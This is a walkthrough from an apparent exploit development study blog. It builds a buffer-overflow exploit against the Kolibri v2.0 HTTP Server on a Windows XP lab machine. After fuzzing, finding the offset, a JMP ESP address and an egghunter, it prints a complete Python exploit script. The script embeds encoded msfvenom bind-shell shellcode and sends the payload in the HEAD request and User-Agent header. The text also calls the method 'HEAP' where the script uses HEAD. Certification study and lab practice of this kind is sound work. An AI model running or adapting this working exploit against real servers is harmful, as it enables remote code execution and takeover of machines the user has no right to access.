Exploit Development : Kolibri v2.0 HTTP Server with EggHunter
I decide to write and publish a series of exercises walkthrough while I’m preparing for the OSCE exam. These exercises will heavily focus on exploit development
Exercises Reference : fuzzysecurity http://fuzzysecurity.com/tutorials/expDev/4.html
Kali Linux : 10.0.2.15
Windows XP Pro Sp3 running Kolibri v2.0 HTTP Server : 10.0.2.7
The list of badcharacters : “\x00\x0d\x0a\x3d\x20\x3f”
Run the Kolibri v2.0 HTTP Server on win XP (the debugging machine)
The HTTP server is running on port 8080
Attach the Kolibri to Immunity debugger while running
Let’s create our initial python script to replicate the crash on Kali machine
Send 600 “A”s to the victim machine using HEAP HTTP method
EIP register is overwritten with “\x41”, the letter A in hex decimal.
Follow ESP in dump we can see the buffer
Use pattern_create.rb and pattern_offset.rb to find out how many “A”s we need to reach EIP
replace the pattern we created with “A”s in the script and run again
We see the EIP is overwritten by 32724131
Which means we need 515 “A”s to reach EIP
Modify the script to verify this and we clearly see the EIP is overwritten by exact four “B”s
Let’s find an address that can redirect execution flow to ESP
!mona jpm -r esp
“JMP ESP” found at 0x71A91C8B of wshtcpip.dll.
update the address (reverse order)
After redirecting our flow with “JMP ESP”, we only had little space to work. Although we have only 2 bytes to be used (C = \x43), there are some good space up where some of our initial “A”s
What we do is jumping up a few bytes back to have some more space to work. One simple Assembly code for so is “\xEB\x??”, where “\xEB” corresponds to the jump and “\x??” to the number of bytes to go back. If we choose 50 bytes to go back, let’s use calc.exe to help us with this math:
the hex is /xCE
Now we have 50 bytes to use , generate a 32 bytes Egg Hunter using mona script with the egg value of “b33f”
Add our shellcode on stage 2 , generate with msfvenom
msfvenom -a x86 — platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
Final step : getting a shell
Set up a net cat listener on our local kali machine , listening on port 4444, execute the python script and we see we got a connect to the victim machine
Done!
Exploit Scripts
#!/usr/bin/python
#
# Author : Chenny Ren
# Exploiting Kolibri HTTP Server (EggHunter)
#
#
import socket
import os
import sys
# jmp esp found at 0x71a91c8b wshtcpip.dll
# Short jmp 50 bytes back opcode: \xEB\xCE
# 32 bytes Egghunter b33f
egghunter = (
“\x66\x81\xca\xff”
“\x0f\x42\x52\x6a”
“\x02\x58\xcd\x2e”
“\x3c\x05\x5a\x74”
“\xef\xb8\x62\x33” #b3
“\x33\x66\x8b\xfa” #3f
“\xaf\x75\xea\xaf”
“\x75\xe7\xff\xe7”)
shellcode = “”
shellcode += “\xd9\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49”
shellcode += “\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37”
shellcode += “\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41”
shellcode += “\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58”
shellcode += “\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x38\x68\x6b\x32”
shellcode += “\x73\x30\x37\x70\x65\x50\x51\x70\x6e\x69\x6a\x45\x70”
shellcode += “\x31\x4b\x70\x75\x34\x4e\x6b\x62\x70\x50\x30\x6c\x4b”
shellcode += “\x36\x32\x34\x4c\x4e\x6b\x31\x42\x35\x44\x4c\x4b\x52”
shellcode += “\x52\x65\x78\x46\x6f\x6d\x67\x31\x5a\x35\x76\x66\x51”
shellcode += “\x39\x6f\x6c\x6c\x67\x4c\x45\x31\x73\x4c\x44\x42\x66”
shellcode += “\x4c\x47\x50\x79\x51\x5a\x6f\x34\x4d\x33\x31\x58\x47”
shellcode += “\x68\x62\x38\x72\x70\x52\x52\x77\x4c\x4b\x53\x62\x36”
shellcode += “\x70\x6c\x4b\x53\x7a\x45\x6c\x6e\x6b\x62\x6c\x66\x71”
shellcode += “\x50\x78\x68\x63\x43\x78\x46\x61\x6e\x31\x52\x71\x4e”
shellcode += “\x6b\x56\x39\x65\x70\x45\x51\x59\x43\x6e\x6b\x43\x79”
shellcode += “\x75\x48\x7a\x43\x67\x4a\x51\x59\x4e\x6b\x37\x44\x6e”
shellcode += “\x6b\x76\x61\x49\x46\x66\x51\x39\x6f\x6e\x4c\x6f\x31”
shellcode += “\x5a\x6f\x36\x6d\x73\x31\x6a\x67\x67\x48\x79\x70\x51”
shellcode += “\x65\x59\x66\x36\x63\x63\x4d\x6a\x58\x47\x4b\x71\x6d”
shellcode += “\x34\x64\x51\x65\x59\x74\x76\x38\x4e\x6b\x42\x78\x31”
shellcode += “\x34\x35\x51\x49\x43\x51\x76\x6e\x6b\x34\x4c\x70\x4b”
shellcode += “\x6e\x6b\x43\x68\x55\x4c\x76\x61\x79\x43\x4e\x6b\x35”
shellcode += “\x54\x4c\x4b\x35\x51\x4a\x70\x6c\x49\x43\x74\x56\x44”
shellcode += “\x46\x44\x33\x6b\x63\x6b\x73\x51\x51\x49\x63\x6a\x42”
shellcode += “\x71\x79\x6f\x79\x70\x53\x6f\x43\x6f\x43\x6a\x4c\x4b”
shellcode += “\x32\x32\x4a\x4b\x4e\x6d\x71\x4d\x61\x78\x57\x43\x77”
shellcode += “\x42\x47\x70\x47\x70\x63\x58\x31\x67\x50\x73\x76\x52”
shellcode += “\x73\x6f\x31\x44\x42\x48\x70\x4c\x53\x47\x67\x56\x36”
shellcode += “\x67\x79\x6f\x6b\x65\x6c\x78\x4c\x50\x65\x51\x73\x30”
shellcode += “\x55\x50\x75\x79\x79\x54\x30\x54\x46\x30\x61\x78\x45”
shellcode += “\x79\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x69\x45\x73\x5a”
shellcode += “\x64\x48\x73\x69\x32\x70\x38\x62\x39\x6d\x73\x70\x76”
shellcode += “\x30\x37\x30\x76\x30\x70\x68\x38\x6a\x64\x4f\x79\x4f”
shellcode += “\x79\x70\x79\x6f\x68\x55\x5a\x37\x45\x38\x63\x32\x47”
shellcode += “\x70\x74\x51\x43\x6c\x4f\x79\x79\x76\x53\x5a\x62\x30”
shellcode += “\x36\x36\x43\x67\x53\x58\x68\x42\x49\x4b\x77\x47\x43”
shellcode += “\x57\x4b\x4f\x39\x45\x71\x47\x30\x68\x48\x37\x4b\x59”
shellcode += “\x50\x38\x79\x6f\x4b\x4f\x59\x45\x53\x67\x52\x48\x31”
shellcode += “\x64\x38\x6c\x67\x4b\x38\x61\x4b\x4f\x4b\x65\x43\x67”
shellcode += “\x6f\x67\x71\x78\x63\x45\x32\x4e\x32\x6d\x63\x51\x79”
shellcode += “\x6f\x5a\x75\x55\x38\x32\x43\x42\x4d\x43\x54\x75\x50”
shellcode += “\x6b\x39\x69\x73\x73\x67\x56\x37\x46\x37\x66\x51\x58”
shellcode += “\x76\x63\x5a\x46\x72\x76\x39\x33\x66\x39\x72\x4b\x4d”
shellcode += “\x30\x66\x78\x47\x50\x44\x56\x44\x75\x6c\x65\x51\x36”
shellcode += “\x61\x4e\x6d\x62\x64\x61\x34\x74\x50\x39\x56\x65\x50”
shellcode += “\x31\x54\x73\x64\x66\x30\x52\x76\x62\x76\x30\x56\x51”
shellcode += “\x56\x76\x36\x52\x6e\x32\x76\x66\x36\x31\x43\x63\x66”
shellcode += “\x42\x48\x32\x59\x48\x4c\x35\x6f\x6e\x66\x79\x6f\x58”
shellcode += “\x55\x6c\x49\x69\x70\x30\x4e\x56\x36\x61\x56\x4b\x4f”
shellcode += “\x36\x50\x62\x48\x54\x48\x4f\x77\x45\x4d\x35\x30\x79”
shellcode += “\x6f\x78\x55\x6f\x4b\x6c\x30\x6d\x65\x4c\x62\x71\x46”
shellcode += “\x61\x78\x4f\x56\x4e\x75\x4d\x6d\x6f\x6d\x79\x6f\x6b”
shellcode += “\x65\x67\x4c\x47\x76\x73\x4c\x54\x4a\x4d\x50\x4b\x4b”
shellcode += “\x4b\x50\x53\x45\x64\x45\x6d\x6b\x32\x67\x56\x73\x42”
shellcode += “\x52\x72\x4f\x72\x4a\x55\x50\x46\x33\x59\x6f\x79\x45”
shellcode += “\x41\x41”
Stage1 = “A” * 478 + egghunter + “A” * 5 + “\x8B\x1C\xA9\x71” + “\xEB\xCE”
Stage2 = “b33fb33f” + shellcode
buffer = (
“HEAD /” + Stage1 + “ HTTP/1.1\r\n”
“Host: 10.0.2.7:8080\r\n”
“User-Agent: “ + Stage2 + “\r\n”
“Keep-Alive: 115\r\n”
“Connection: keep-alive\r\n\r\n”)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((“10.0.2.7”, 8080))
expl.send(buffer)
expl.close()
